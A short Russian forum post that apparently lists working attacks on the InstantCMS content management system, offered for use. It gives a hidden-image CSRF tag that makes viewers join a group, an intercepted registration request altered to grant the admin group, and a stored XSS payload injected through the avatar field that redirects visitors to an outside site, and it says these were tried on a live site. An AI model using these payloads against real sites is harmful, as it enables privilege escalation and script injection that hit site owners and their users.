InstantCMS 0day’и не очень

Скопипащу самого себя с одного форума.

1. Добавление в группу. Увидел сообщение с кодом — добавился. И так все понятно:

   <img src="http://dangeru72zvedwtg.onion/groups/414/join" width="0" alt=" " />

2. Становимся модератором/админом.
   При регистрации перехватываем POST-запрос и меняем номер группы на админский

   Disposition: form-data; name="group_id"\r\n\r\n4\r\n

3. Активная XSS (0day!)
   Редактирум свой профиль. Загружаем аватарку, включаем перехват в тампере и жмем «Сохранить». В перехвате ищем строку наподобие

   Content-Disposition: form-data; name="avatar[micro]"\r\n\r\n261/u26190/000/4c8765c9.jpg\r\n

   И меняем в ней данные на

   261/u26190/000/4c8765c9.jpg">window.location='http://fsb.ru'<a href="
   

Проверял всё тут

Не могу найти где я про один из способов прочитал, поэтому без ссылки. И 15 уже прошло.